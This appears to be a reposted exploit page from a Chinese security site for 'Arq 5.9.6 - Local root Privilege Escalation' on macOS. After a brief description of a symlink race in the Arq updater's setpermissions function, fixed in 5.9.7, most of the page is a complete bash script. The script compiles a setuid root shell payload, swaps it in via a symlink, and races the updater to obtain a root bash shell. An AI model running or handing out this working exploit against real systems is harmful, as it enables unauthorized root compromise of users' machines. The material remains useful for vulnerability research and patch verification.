首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Arq 5.9.6 - Local root Privilege Escalation
来源:https://m4.rkw.io/blog.html 作者:Wadham 发布时间:2017-12-06  
# Arq Backup from Haystack Software is a great application for backing up macs and
# windows machines. Unfortunately versions of Arq for mac before 5.9.7 are
# vulnerable to a local root privilege escalation exploit.
 
# The updater binary has a "setpermissions" function which sets the suid bit and
# root ownership on itself but it suffers from a race condition that allows you to
# swap the destination for these privileges using a symlink.
 
# We can exploit this to get +s and root ownership on any arbitrary binary.
 
# Other binaries in the application also suffer from the same issue.
 
# This was fixed in Arq 5.9.7.
 
# https://m4.rkw.io/arq_5.9.6.sh.txt
# 49cc82df33a3e23245c7a1659cc74c0e554d5fdbe2547ac14e838338e823956d
# ------------------------------------------------------------------------------
#!/bin/bash
 
##################################################################
###### Arq <= 5.9.6 local root privilege escalation exploit ######
###### by m4rkw - https://m4.rkw.io/blog.html                 ####
##################################################################
 
vuln=`ls -la /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater |grep 'rwsr-xr-x' \
|grep root`
 
cwd="`pwd`"
 
if [ "$vuln" == "" ] ; then
  echo "Not vulnerable - auto-updates not enabled."
  exit 1
fi
 
cat > arq_596_exp.c <<EOF
#include <unistd.h>
int main()
{
  setuid(0);
  seteuid(0);
  execl(
    "/bin/bash","bash","-c","rm -f $cwd/arq_updater;/bin/bash",
    NULL
  );
  return 0;
}
EOF
 
gcc -o arq_596_exp arq_596_exp.c
rm -f arq_596_exp.c
 
ln -s /Applications/Arq.app/Contents/Library/LoginItems/\
Arq\ Agent.app/Contents/Resources/arq_updater
 
./arq_updater setpermissions &>/dev/null&
rm -f ./arq_updater
mv arq_596_exp ./arq_updater
 
i=0
timeout=10
 
while :
do
  r=`ls -la ./arq_updater |grep root`
  if [ "$r" != "" ] ; then
    break
  fi
  sleep 0.1
  i=$((i+1))
  if [ $i -eq $timeout ] ; then
    rm -f ./arq_updater
    echo "Not vulnerable"
    exit 1
  fi
done
 
./arq_updater
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Yahoo! Messenger Webcam 8.1 Ac
·Apache 2.2.0 - 2.2.11 Remote e
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
·HT Editor File openning Stack
  相关文章
·Murus 1.4.11 - Local root Priv
·Hashicorp vagrant-vmware-fusio
·Arq 5.9.7 - Local root Privile
·WinduCMS 3.1 - Local File Disc
·VX Search 10.2.14 - 'command_n
·Abyss Web Server < 2.11.6 - He
·Artica Web Proxy 3.06 - Remote
·MistServer 2.12 - Cross-Site S
·WinduCMS 3.1 Local File Disclo
·SocuSoft Co. Photo 2 Video Con
·aws-cfn-bootstrap Local Code E
·HP iMC Plat 7.2 - Remote Code
  推荐广告
CopyRight © 2002-2017 VFocuS.Net All Rights Reserved